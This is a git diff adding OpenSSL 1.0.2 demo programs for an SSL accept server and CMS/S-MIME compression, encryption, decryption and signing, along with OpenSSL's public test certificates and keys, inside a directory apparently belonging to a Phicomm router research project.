+    CONF_VALUE *cnf;
+    long errline = -1;
+    char buf[512];
+    int ret = 1, i;
+
+    SSL_load_error_strings();
+
+    /* Add ciphers and message digests */
+    OpenSSL_add_ssl_algorithms();
+
+    conf = NCONF_new(NULL);
+
+    if (NCONF_load(conf, "accept.cnf", &errline) <= 0) {
+        if (errline <= 0)
+            fprintf(stderr, "Error processing config file\n");
+        else
+            fprintf(stderr, "Error on line %ld\n", errline);
+        goto err;
+    }
+
+    sect = NCONF_get_section(conf, "default");
+
+    if (sect == NULL) {
+        fprintf(stderr, "Error retrieving default section\n");
+        goto err;
+    }
+
+    ctx = SSL_CTX_new(SSLv23_server_method());
+    cctx = SSL_CONF_CTX_new();
+    SSL_CONF_CTX_set_flags(cctx, SSL_CONF_FLAG_SERVER);
+    SSL_CONF_CTX_set_flags(cctx, SSL_CONF_FLAG_CERTIFICATE);
+    SSL_CONF_CTX_set_flags(cctx, SSL_CONF_FLAG_FILE);
+    SSL_CONF_CTX_set_ssl_ctx(cctx, ctx);
+    for (i = 0; i < sk_CONF_VALUE_num(sect); i++) {
+        int rv;
+        cnf = sk_CONF_VALUE_value(sect, i);
+        rv = SSL_CONF_cmd(cctx, cnf->name, cnf->value);
+        if (rv > 0)
+            continue;
+        if (rv != -2) {
+            fprintf(stderr, "Error processing %s = %s\n",
+                    cnf->name, cnf->value);
+            ERR_print_errors_fp(stderr);
+            goto err;
+        }
+        if (!strcmp(cnf->name, "Port")) {
+            port = cnf->value;
+        } else {
+            fprintf(stderr, "Unknown configuration option %s\n", cnf->name);
+            goto err;
+        }
+    }
+
+    if (!SSL_CONF_CTX_finish(cctx)) {
+        fprintf(stderr, "Finish error\n");
+        ERR_print_errors_fp(stderr);
+        goto err;
+    }
+
+    /* Setup server side SSL bio */
+    ssl_bio = BIO_new_ssl(ctx, 0);
+
+    if ((in = BIO_new_accept(port)) == NULL)
+        goto err;
+
+    /*
+     * This means that when a new connection is accepted on 'in', The ssl_bio
+     * will be 'duplicated' and have the new socket BIO push into it.
+     * Basically it means the SSL BIO will be automatically setup
+     */
+    BIO_set_accept_bios(in, ssl_bio);
+
+ again:
+    /*
+     * The first call will setup the accept socket, and the second will get a
+     * socket.  In this loop, the first actual accept will occur in the
+     * BIO_read() function.
+     */
+
+    if (BIO_do_accept(in) <= 0)
+        goto err;
+
+    for (;;) {
+        i = BIO_read(in, buf, 512);
+        if (i == 0) {
+            /*
+             * If we have finished, remove the underlying BIO stack so the
+             * next time we call any function for this BIO, it will attempt
+             * to do an accept
+             */
+            printf("Done\n");
+            tmp = BIO_pop(in);
+            BIO_free_all(tmp);
+            goto again;
+        }
+        if (i < 0) {
+            if (BIO_should_retry(in))
+                continue;
+            goto err;
+        }
+        fwrite(buf, 1, i, stdout);
+        fflush(stdout);
+    }
+
+    ret = 0;
+ err:
+    if (ret) {
+        ERR_print_errors_fp(stderr);
+    }
+    if (in != NULL)
+        BIO_free(in);
+    exit(ret);
+    return (!ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/server.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/server.pem
new file mode 100644
index 0000000..d0fc265
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/bio/server.pem
@@ -0,0 +1,52 @@
+subject= C = UK, O = OpenSSL Group, OU = FOR TESTING PURPOSES ONLY, CN = Test Server Cert
+issuer= C = UK, O = OpenSSL Group, OU = FOR TESTING PURPOSES ONLY, CN = OpenSSL Test Intermediate CA
+-----BEGIN CERTIFICATE-----
+MIID5zCCAs+gAwIBAgIJALnu1NlVpZ6zMA0GCSqGSIb3DQEBBQUAMHAxCzAJBgNV
+BAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMSIwIAYDVQQLDBlGT1IgVEVT
+VElORyBQVVJQT1NFUyBPTkxZMSUwIwYDVQQDDBxPcGVuU1NMIFRlc3QgSW50ZXJt
+ZWRpYXRlIENBMB4XDTExMTIwODE0MDE0OFoXDTIxMTAxNjE0MDE0OFowZDELMAkG
+A1UEBhMCVUsxFjAUBgNVBAoMDU9wZW5TU0wgR3JvdXAxIjAgBgNVBAsMGUZPUiBU
+RVNUSU5HIFBVUlBPU0VTIE9OTFkxGTAXBgNVBAMMEFRlc3QgU2VydmVyIENlcnQw
+ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDzhPOSNtyyRspmeuUpxfNJ
+KCLTuf7g3uQ4zu4iHOmRO5TQci+HhVlLZrHF9XqFXcIP0y4pWDbMSGuiorUmzmfi
+R7bfSdI/+qIQt8KXRH6HNG1t8ou0VSvWId5TS5Dq/er5ODUr9OaaDva7EquHIcMv
+vPQGuI+OEAcnleVCy9HVEIySrO4P3CNIicnGkwwiAud05yUAq/gPXBC1hTtmlPD7
+TVcGVSEiJdvzqqlgv02qedGrkki6GY4S7GjZxrrf7Foc2EP+51LJzwLQx3/JfrCU
+41NEWAsu/Sl0tQabXESN+zJ1pDqoZ3uHMgpQjeGiE0olr+YcsSW/tJmiU9OiAr8R
+AgMBAAGjgY8wgYwwDAYDVR0TAQH/BAIwADAOBgNVHQ8BAf8EBAMCBeAwLAYJYIZI
+AYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1UdDgQW
+BBSCvM8AABPR9zklmifnr9LvIBturDAfBgNVHSMEGDAWgBQ2w2yI55X+sL3szj49
+hqshgYfa2jANBgkqhkiG9w0BAQUFAAOCAQEAqb1NV0B0/pbpK9Z4/bNjzPQLTRLK
+WnSNm/Jh5v0GEUOE/Beg7GNjNrmeNmqxAlpqWz9qoeoFZax+QBpIZYjROU3TS3fp
+yLsrnlr0CDQ5R7kCCDGa8dkXxemmpZZLbUCpW2Uoy8sAA4JjN9OtsZY7dvUXFgJ7
+vVNTRnI01ghknbtD+2SxSQd3CWF6QhcRMAzZJ1z1cbbwGDDzfvGFPzJ+Sq+zEPds
+xoVLLSetCiBc+40ZcDS5dV98h9XD7JMTQfxzA7mNGv73JoZJA6nFgj+ADSlJsY/t
+JBv+z1iQRueoh9Qeee+ZbRifPouCB8FDx+AltvHTANdAq0t/K3o+pplMVA==
+-----END CERTIFICATE-----
+-----BEGIN RSA PRIVATE KEY-----
+MIIEpAIBAAKCAQEA84TzkjbcskbKZnrlKcXzSSgi07n+4N7kOM7uIhzpkTuU0HIv
+h4VZS2axxfV6hV3CD9MuKVg2zEhroqK1Js5n4ke230nSP/qiELfCl0R+hzRtbfKL
+tFUr1iHeU0uQ6v3q+Tg1K/Tmmg72uxKrhyHDL7z0BriPjhAHJ5XlQsvR1RCMkqzu
+D9wjSInJxpMMIgLndOclAKv4D1wQtYU7ZpTw+01XBlUhIiXb86qpYL9NqnnRq5JI
+uhmOEuxo2ca63+xaHNhD/udSyc8C0Md/yX6wlONTRFgLLv0pdLUGm1xEjfsydaQ6
+qGd7hzIKUI3hohNKJa/mHLElv7SZolPTogK/EQIDAQABAoIBAADq9FwNtuE5IRQn
+zGtO4q7Y5uCzZ8GDNYr9RKp+P2cbuWDbvVAecYq2NV9QoIiWJOAYZKklOvekIju3
+r0UZLA0PRiIrTg6NrESx3JrjWDK8QNlUO7CPTZ39/K+FrmMkV9lem9yxjJjyC34D
+AQB+YRTx+l14HppjdxNwHjAVQpIx/uO2F5xAMuk32+3K+pq9CZUtrofe1q4Agj9R
+5s8mSy9pbRo9kW9wl5xdEotz1LivFOEiqPUJTUq5J5PeMKao3vdK726XI4Z455Nm
+W2/MA0YV0ug2FYinHcZdvKM6dimH8GLfa3X8xKRfzjGjTiMSwsdjgMa4awY3tEHH
+674jhAECgYEA/zqMrc0zsbNk83sjgaYIug5kzEpN4ic020rSZsmQxSCerJTgNhmg
+utKSCt0Re09Jt3LqG48msahX8ycqDsHNvlEGPQSbMu9IYeO3Wr3fAm75GEtFWePY
+BhM73I7gkRt4s8bUiUepMG/wY45c5tRF23xi8foReHFFe9MDzh8fJFECgYEA9EFX
+4qAik1pOJGNei9BMwmx0I0gfVEIgu0tzeVqT45vcxbxr7RkTEaDoAG6PlbWP6D9a
+WQNLp4gsgRM90ZXOJ4up5DsAWDluvaF4/omabMA+MJJ5kGZ0gCj5rbZbKqUws7x8
+bp+6iBfUPJUbcqNqFmi/08Yt7vrDnMnyMw2A/sECgYEAiiuRMxnuzVm34hQcsbhH
+6ymVqf7j0PW2qK0F4H1ocT9qhzWFd+RB3kHWrCjnqODQoI6GbGr/4JepHUpre1ex
+4UEN5oSS3G0ru0rC3U4C59dZ5KwDHFm7ffZ1pr52ljfQDUsrjjIMRtuiwNK2OoRa
+WSsqiaL+SDzSB+nBmpnAizECgYBdt/y6rerWUx4MhDwwtTnel7JwHyo2MDFS6/5g
+n8qC2Lj6/fMDRE22w+CA2esp7EJNQJGv+b27iFpbJEDh+/Lf5YzIT4MwVskQ5bYB
+JFcmRxUVmf4e09D7o705U/DjCgMH09iCsbLmqQ38ONIRSHZaJtMDtNTHD1yi+jF+
+OT43gQKBgQC/2OHZoko6iRlNOAQ/tMVFNq7fL81GivoQ9F1U0Qr+DH3ZfaH8eIkX
+xT0ToMPJUzWAn8pZv0snA0um6SIgvkCuxO84OkANCVbttzXImIsL7pFzfcwV/ERK
+UM6j0ZuSMFOCr/lGPAoOQU0fskidGEHi1/kW+suSr28TqsyYZpwBDQ==
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cacert.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cacert.pem
new file mode 100644
index 0000000..75cbb34
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cacert.pem
@@ -0,0 +1,18 @@
+-----BEGIN CERTIFICATE-----
+MIIC6DCCAlGgAwIBAgIJAMfGO3rdo2uUMA0GCSqGSIb3DQEBBAUAMFcxCzAJBgNV
+BAYTAlVLMRIwEAYDVQQHEwlUZXN0IENpdHkxFjAUBgNVBAoTDU9wZW5TU0wgR3Jv
+dXAxHDAaBgNVBAMTE1Rlc3QgUy9NSU1FIFJvb3QgQ0EwHhcNMDcwNDEzMTc0MzE3
+WhcNMTcwNDEwMTc0MzE3WjBXMQswCQYDVQQGEwJVSzESMBAGA1UEBxMJVGVzdCBD
+aXR5MRYwFAYDVQQKEw1PcGVuU1NMIEdyb3VwMRwwGgYDVQQDExNUZXN0IFMvTUlN
+RSBSb290IENBMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqJMal1uC1/1wz
+i5+dE4EZF2im3BgROm5PVMbwPY9V1t+KYvtdc3rMcRgJaMbP+qaEcDXoIsZfYXGR
+ielgfDNZmZcj1y/FOum+Jc2OZMs3ggPmjIQ3dbBECq0hZKcbz7wfr+2OeNWm46iT
+jcSIXpGIRhUYEzOgv7zb8oOU70IbbwIDAQABo4G7MIG4MB0GA1UdDgQWBBRHUypx
+CXFQYqewhGo72lWPQUsjoDCBiAYDVR0jBIGAMH6AFEdTKnEJcVBip7CEajvaVY9B
+SyOgoVukWTBXMQswCQYDVQQGEwJVSzESMBAGA1UEBxMJVGVzdCBDaXR5MRYwFAYD
+VQQKEw1PcGVuU1NMIEdyb3VwMRwwGgYDVQQDExNUZXN0IFMvTUlNRSBSb290IENB
+ggkAx8Y7et2ja5QwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQQFAAOBgQANI+Yc
+G/YDM1WMUGEzEkU9UhsIUqdyBebnK3+OyxZSouDcE/M10jFJzBf/F5b0uUGAKWwo
+u0dzmILfKjdfWe8EyCRafZcm00rVcO09i/63FBYzlHbmfUATIqZdhKzxxQMPs5mF
+1je+pHUpzIY8TSXyh/uD9IkAy04IHwGZQf9akw==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cakey.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cakey.pem
new file mode 100644
index 0000000..3b53c5e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cakey.pem
@@ -0,0 +1,15 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIICXgIBAAKBgQCqJMal1uC1/1wzi5+dE4EZF2im3BgROm5PVMbwPY9V1t+KYvtd
+c3rMcRgJaMbP+qaEcDXoIsZfYXGRielgfDNZmZcj1y/FOum+Jc2OZMs3ggPmjIQ3
+dbBECq0hZKcbz7wfr+2OeNWm46iTjcSIXpGIRhUYEzOgv7zb8oOU70IbbwIDAQAB
+AoGBAKWOZ2UTc1BkjDjz0XoscmAR8Rj77MdGzfOPkIxPultSW+3yZpkGNyUbnsH5
+HAtf4Avai/m3bMN+s91kDpx9/g/I9ZEHPQLcDICETvwt/EHT7+hwvaQgsM+TgpMs
+tjlGZOWent6wVIuvwwzqOMXZLgK9FvY7upwgtrys4G3Kab5hAkEA2QzFflWyEvKS
+rMSaVtn/IjFilwa7H0IdakkjM34z4peerFTPBr4J47YD4RCR/dAvxyNy3zUxtH18
+9R6dUixI6QJBAMitJD0xOkbGWBX8KVJvRiKOIdf/95ZUAgN/h3bWKy57EB9NYj3u
+jbxXcvdjfSqiITykkjAg7SG7nrlzJsu6CpcCQG6gVsy0auXDY0TRlASuaZ6I40Is
+uRUOgqWYj2uAaHuWYdZeB4LdO3cnX0TISFDAWom6JKNlnmbrCtR4fSDT13kCQQCU
++VQJyV3F5MDHsWbLt6eNR46AV5lpk/vatPXPlrZ/zwPs+PmRmGLICvNiDA2DdNDP
+wCx2Zjsj67CtY3rNitMJAkEAm09BQnjnbBXUb1rd2SjNDWTsu80Z+zLu8pAwXNhW
+8nsvMYqlYMIxuMPwu/QuTnMRhMZ08uhqoD3ukZnBeoMEVg==
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_comp.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_comp.c
new file mode 100644
index 0000000..059152f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_comp.c
@@ -0,0 +1,60 @@
+/* Simple S/MIME compress example */
+#include <openssl/pem.h>
+#include <openssl/cms.h>
+#include <openssl/err.h>
+
+int main(int argc, char **argv)
+{
+    BIO *in = NULL, *out = NULL;
+    CMS_ContentInfo *cms = NULL;
+    int ret = 1;
+
+    /*
+     * On OpenSSL 1.0.0+ only:
+     * for streaming set CMS_STREAM
+     */
+    int flags = CMS_STREAM;
+
+    OpenSSL_add_all_algorithms();
+    ERR_load_crypto_strings();
+
+    /* Open content being compressed */
+
+    in = BIO_new_file("comp.txt", "r");
+
+    if (!in)
+        goto err;
+
+    /* compress content */
+    cms = CMS_compress(in, NID_zlib_compression, flags);
+
+    if (!cms)
+        goto err;
+
+    out = BIO_new_file("smcomp.txt", "w");
+    if (!out)
+        goto err;
+
+    /* Write out S/MIME message */
+    if (!SMIME_write_CMS(out, cms, in, flags))
+        goto err;
+
+    ret = 0;
+
+ err:
+
+    if (ret) {
+        fprintf(stderr, "Error Compressing Data\n");
+        ERR_print_errors_fp(stderr);
+    }
+
+    if (cms)
+        CMS_ContentInfo_free(cms);
+    if (in)
+        BIO_free(in);
+    if (out)
+        BIO_free(out);
+
+    return ret;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_ddec.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_ddec.c
new file mode 100644
index 0000000..37ac97f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_ddec.c
@@ -0,0 +1,89 @@
+/*
+ * S/MIME detached data decrypt example: rarely done but should the need
+ * arise this is an example....
+ */
+#include <openssl/pem.h>
+#include <openssl/cms.h>
+#include <openssl/err.h>
+
+int main(int argc, char **argv)
+{
+    BIO *in = NULL, *out = NULL, *tbio = NULL, *dcont = NULL;
+    X509 *rcert = NULL;
+    EVP_PKEY *rkey = NULL;
+    CMS_ContentInfo *cms = NULL;
+    int ret = 1;
+
+    OpenSSL_add_all_algorithms();
+    ERR_load_crypto_strings();
+
+    /* Read in recipient certificate and private key */
+    tbio = BIO_new_file("signer.pem", "r");
+
+    if (!tbio)
+        goto err;
+
+    rcert = PEM_read_bio_X509(tbio, NULL, 0, NULL);
+
+    BIO_reset(tbio);
+
+    rkey = PEM_read_bio_PrivateKey(tbio, NULL, 0, NULL);
+
+    if (!rcert || !rkey)
+        goto err;
+
+    /* Open PEM file containing enveloped data */
+
+    in = BIO_new_file("smencr.pem", "r");
+
+    if (!in)
+        goto err;
+
+    /* Parse PEM content */
+    cms = PEM_read_bio_CMS(in, NULL, 0, NULL);
+
+    if (!cms)
+        goto err;
+
+    /* Open file containing detached content */
+    dcont = BIO_new_file("smencr.out", "rb");
+
+    if (!in)
+        goto err;
+
+    out = BIO_new_file("encrout.txt", "w");
+    if (!out)
+        goto err;
+
+    /* Decrypt S/MIME message */
+    if (!CMS_decrypt(cms, rkey, rcert, dcont, out, 0))
+        goto err;
+
+    ret = 0;
+
+ err:
+
+    if (ret) {
+        fprintf(stderr, "Error Decrypting Data\n");
+        ERR_print_errors_fp(stderr);
+    }
+
+    if (cms)
+        CMS_ContentInfo_free(cms);
+    if (rcert)
+        X509_free(rcert);
+    if (rkey)
+        EVP_PKEY_free(rkey);
+
+    if (in)
+        BIO_free(in);
+    if (out)
+        BIO_free(out);
+    if (tbio)
+        BIO_free(tbio);
+    if (dcont)
+        BIO_free(dcont);
+
+    return ret;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_dec.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_dec.c
new file mode 100644
index 0000000..3291eac
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_dec.c
@@ -0,0 +1,78 @@
+/* Simple S/MIME decryption example */
+#include <openssl/pem.h>
+#include <openssl/cms.h>
+#include <openssl/err.h>
+
+int main(int argc, char **argv)
+{
+    BIO *in = NULL, *out = NULL, *tbio = NULL;
+    X509 *rcert = NULL;
+    EVP_PKEY *rkey = NULL;
+    CMS_ContentInfo *cms = NULL;
+    int ret = 1;
+
+    OpenSSL_add_all_algorithms();
+    ERR_load_crypto_strings();
+
+    /* Read in recipient certificate and private key */
+    tbio = BIO_new_file("signer.pem", "r");
+
+    if (!tbio)
+        goto err;
+
+    rcert = PEM_read_bio_X509(tbio, NULL, 0, NULL);
+
+    BIO_reset(tbio);
+
+    rkey = PEM_read_bio_PrivateKey(tbio, NULL, 0, NULL);
+
+    if (!rcert || !rkey)
+        goto err;
+
+    /* Open S/MIME message to decrypt */
+
+    in = BIO_new_file("smencr.txt", "r");
+
+    if (!in)
+        goto err;
+
+    /* Parse message */
+    cms = SMIME_read_CMS(in, NULL);
+
+    if (!cms)
+        goto err;
+
+    out = BIO_new_file("decout.txt", "w");
+    if (!out)
+        goto err;
+
+    /* Decrypt S/MIME message */
+    if (!CMS_decrypt(cms, rkey, rcert, NULL, out, 0))
+        goto err;
+
+    ret = 0;
+
+ err:
+
+    if (ret) {
+        fprintf(stderr, "Error Decrypting Data\n");
+        ERR_print_errors_fp(stderr);
+    }
+
+    if (cms)
+        CMS_ContentInfo_free(cms);
+    if (rcert)
+        X509_free(rcert);
+    if (rkey)
+        EVP_PKEY_free(rkey);
+
+    if (in)
+        BIO_free(in);
+    if (out)
+        BIO_free(out);
+    if (tbio)
+        BIO_free(tbio);
+
+    return ret;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_denc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_denc.c
new file mode 100644
index 0000000..c86a5fd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_denc.c
@@ -0,0 +1,98 @@
+/*
+ * S/MIME detached data encrypt example: rarely done but should the need
+ * arise this is an example....
+ */
+#include <openssl/pem.h>
+#include <openssl/cms.h>
+#include <openssl/err.h>
+
+int main(int argc, char **argv)
+{
+    BIO *in = NULL, *out = NULL, *tbio = NULL, *dout = NULL;
+    X509 *rcert = NULL;
+    STACK_OF(X509) *recips = NULL;
+    CMS_ContentInfo *cms = NULL;
+    int ret = 1;
+
+    int flags = CMS_STREAM | CMS_DETACHED;
+
+    OpenSSL_add_all_algorithms();
+    ERR_load_crypto_strings();
+
+    /* Read in recipient certificate */
+    tbio = BIO_new_file("signer.pem", "r");
+
+    if (!tbio)
+        goto err;
+
+    rcert = PEM_read_bio_X509(tbio, NULL, 0, NULL);
+
+    if (!rcert)
+        goto err;
+
+    /* Create recipient STACK and add recipient cert to it */
+    recips = sk_X509_new_null();
+
+    if (!recips || !sk_X509_push(recips, rcert))
+        goto err;
+
+    /*
+     * sk_X509_pop_free will free up recipient STACK and its contents so set
+     * rcert to NULL so it isn't freed up twice.
+     */
+    rcert = NULL;
+
+    /* Open content being encrypted */
+
+    in = BIO_new_file("encr.txt", "r");
+
+    dout = BIO_new_file("smencr.out", "wb");
+
+    if (!in)
+        goto err;
+
+    /* encrypt content */
+    cms = CMS_encrypt(recips, in, EVP_des_ede3_cbc(), flags);
+
+    if (!cms)
+        goto err;
+
+    out = BIO_new_file("smencr.pem", "w");
+    if (!out)
+        goto err;
+
+    if (!CMS_final(cms, in, dout, flags))
+        goto err;
+
+    /* Write out CMS structure without content */
+    if (!PEM_write_bio_CMS(out, cms))
+        goto err;
+
+    ret = 0;
+
+ err:
+
+    if (ret) {
+        fprintf(stderr, "Error Encrypting Data\n");
+        ERR_print_errors_fp(stderr);
+    }
+
+    if (cms)
+        CMS_ContentInfo_free(cms);
+    if (rcert)
+        X509_free(rcert);
+    if (recips)
+        sk_X509_pop_free(recips, X509_free);
+
+    if (in)
+        BIO_free(in);
+    if (out)
+        BIO_free(out);
+    if (dout)
+        BIO_free(dout);
+    if (tbio)
+        BIO_free(tbio);
+
+    return ret;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_enc.c
new file mode 100644
index 0000000..e8ecb48
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_enc.c
@@ -0,0 +1,92 @@
+/* Simple S/MIME encrypt example */
+#include <openssl/pem.h>
+#include <openssl/cms.h>
+#include <openssl/err.h>
+
+int main(int argc, char **argv)
+{
+    BIO *in = NULL, *out = NULL, *tbio = NULL;
+    X509 *rcert = NULL;
+    STACK_OF(X509) *recips = NULL;
+    CMS_ContentInfo *cms = NULL;
+    int ret = 1;
+
+    /*
+     * On OpenSSL 1.0.0 and later only:
+     * for streaming set CMS_STREAM
+     */
+    int flags = CMS_STREAM;
+
+    OpenSSL_add_all_algorithms();
+    ERR_load_crypto_strings();
+
+    /* Read in recipient certificate */
+    tbio = BIO_new_file("signer.pem", "r");
+
+    if (!tbio)
+        goto err;
+
+    rcert = PEM_read_bio_X509(tbio, NULL, 0, NULL);
+
+    if (!rcert)
+        goto err;
+
+    /* Create recipient STACK and add recipient cert to it */
+    recips = sk_X509_new_null();
+
+    if (!recips || !sk_X509_push(recips, rcert))
+        goto err;
+
+    /*
+     * sk_X509_pop_free will free up recipient STACK and its contents so set
+     * rcert to NULL so it isn't freed up twice.
+     */
+    rcert = NULL;
+
+    /* Open content being encrypted */
+
+    in = BIO_new_file("encr.txt", "r");
+
+    if (!in)
+        goto err;
+
+    /* encrypt content */
+    cms = CMS_encrypt(recips, in, EVP_des_ede3_cbc(), flags);
+
+    if (!cms)
+        goto err;
+
+    out = BIO_new_file("smencr.txt", "w");
+    if (!out)
+        goto err;
+
+    /* Write out S/MIME message */
+    if (!SMIME_write_CMS(out, cms, in, flags))
+        goto err;
+
+    ret = 0;
+
+ err:
+
+    if (ret) {
+        fprintf(stderr, "Error Encrypting Data\n");
+        ERR_print_errors_fp(stderr);
+    }
+
+    if (cms)
+        CMS_ContentInfo_free(cms);
+    if (rcert)
+        X509_free(rcert);
+    if (recips)
+        sk_X509_pop_free(recips, X509_free);
+
+    if (in)
+        BIO_free(in);
+    if (out)
+        BIO_free(out);
+    if (tbio)
+        BIO_free(tbio);
+
+    return ret;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_sign.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_sign.c
new file mode 100644
index 0000000..4bf85d1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_sign.c
@@ -0,0 +1,88 @@
+/* Simple S/MIME signing example */
+#include <openssl/pem.h>
+#include <openssl/cms.h>
+#include <openssl/err.h>
+
+int main(int argc, char **argv)
+{
+    BIO *in = NULL, *out = NULL, *tbio = NULL;
+    X509 *scert = NULL;
+    EVP_PKEY *skey = NULL;
+    CMS_ContentInfo *cms = NULL;
+    int ret = 1;
+
+    /*
+     * For simple S/MIME signing use CMS_DETACHED. On OpenSSL 1.0.0 only: for
+     * streaming detached set CMS_DETACHED|CMS_STREAM for streaming
+     * non-detached set CMS_STREAM
+     */
+    int flags = CMS_DETACHED | CMS_STREAM;
+
+    OpenSSL_add_all_algorithms();
+    ERR_load_crypto_strings();
+
+    /* Read in signer certificate and private key */
+    tbio = BIO_new_file("signer.pem", "r");
+
+    if (!tbio)
+        goto err;
+
+    scert = PEM_read_bio_X509(tbio, NULL, 0, NULL);
+
+    BIO_reset(tbio);
+
+    skey = PEM_read_bio_PrivateKey(tbio, NULL, 0, NULL);
+
+    if (!scert || !skey)
+        goto err;
+
+    /* Open content being signed */
+
+    in = BIO_new_file("sign.txt", "r");
+
+    if (!in)
+        goto err;
+
+    /* Sign content */
+    cms = CMS_sign(scert, skey, NULL, in, flags);
+
+    if (!cms)
+        goto err;
+
+    out = BIO_new_file("smout.txt", "w");
+    if (!out)
+        goto err;
+
+    if (!(flags & CMS_STREAM))
+        BIO_reset(in);
+
+    /* Write out S/MIME message */
+    if (!SMIME_write_CMS(out, cms, in, flags))
+        goto err;
+
+    ret = 0;
+
+ err:
+
+    if (ret) {
+        fprintf(stderr, "Error Signing Data\n");
+        ERR_print_errors_fp(stderr);
+    }
+
+    if (cms)
+        CMS_ContentInfo_free(cms);
+    if (scert)
+        X509_free(scert);
+    if (skey)
+        EVP_PKEY_free(skey);
+
+    if (in)
+        BIO_free(in);
+    if (out)
+        BIO_free(out);
+    if (tbio)
+        BIO_free(tbio);
+
+    return ret;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_sign2.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_sign2.c
new file mode 100644
index 0000000..7e98a51
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_sign2.c
@@ -0,0 +1,102 @@
+/* S/MIME signing example: 2 signers */
+#include <openssl/pem.h>
+#include <openssl/cms.h>
+#include <openssl/err.h>
+
+int main(int argc, char **argv)
+{
+    BIO *in = NULL, *out = NULL, *tbio = NULL;
+    X509 *scert = NULL, *scert2 = NULL;
+    EVP_PKEY *skey = NULL, *skey2 = NULL;
+    CMS_ContentInfo *cms = NULL;
+    int ret = 1;
+
+    OpenSSL_add_all_algorithms();
+    ERR_load_crypto_strings();
+
+    tbio = BIO_new_file("signer.pem", "r");
+
+    if (!tbio)
+        goto err;
+
+    scert = PEM_read_bio_X509(tbio, NULL, 0, NULL);
+
+    BIO_reset(tbio);
+
+    skey = PEM_read_bio_PrivateKey(tbio, NULL, 0, NULL);
+
+    BIO_free(tbio);
+
+    tbio = BIO_new_file("signer2.pem", "r");
+
+    if (!tbio)
+        goto err;
+
+    scert2 = PEM_read_bio_X509(tbio, NULL, 0, NULL);
+
+    BIO_reset(tbio);
+
+    skey2 = PEM_read_bio_PrivateKey(tbio, NULL, 0, NULL);
+
+    if (!scert2 || !skey2)
+        goto err;
+
+    in = BIO_new_file("sign.txt", "r");
+
+    if (!in)
+        goto err;
+
+    cms = CMS_sign(NULL, NULL, NULL, in, CMS_STREAM | CMS_PARTIAL);
+
+    if (!cms)
+        goto err;
+
+    /* Add each signer in turn */
+
+    if (!CMS_add1_signer(cms, scert, skey, NULL, 0))
+        goto err;
+
+    if (!CMS_add1_signer(cms, scert2, skey2, NULL, 0))
+        goto err;
+
+    out = BIO_new_file("smout.txt", "w");
+    if (!out)
+        goto err;
+
+    /* NB: content included and finalized by SMIME_write_CMS */
+
+    if (!SMIME_write_CMS(out, cms, in, CMS_STREAM))
+        goto err;
+
+    ret = 0;
+
+ err:
+
+    if (ret) {
+        fprintf(stderr, "Error Signing Data\n");
+        ERR_print_errors_fp(stderr);
+    }
+
+    if (cms)
+        CMS_ContentInfo_free(cms);
+
+    if (scert)
+        X509_free(scert);
+    if (skey)
+        EVP_PKEY_free(skey);
+
+    if (scert2)
+        X509_free(scert2);
+    if (skey)
+        EVP_PKEY_free(skey2);
+
+    if (in)
+        BIO_free(in);
+    if (out)
+        BIO_free(out);
+    if (tbio)
+        BIO_free(tbio);
+
+    return ret;
+
+}
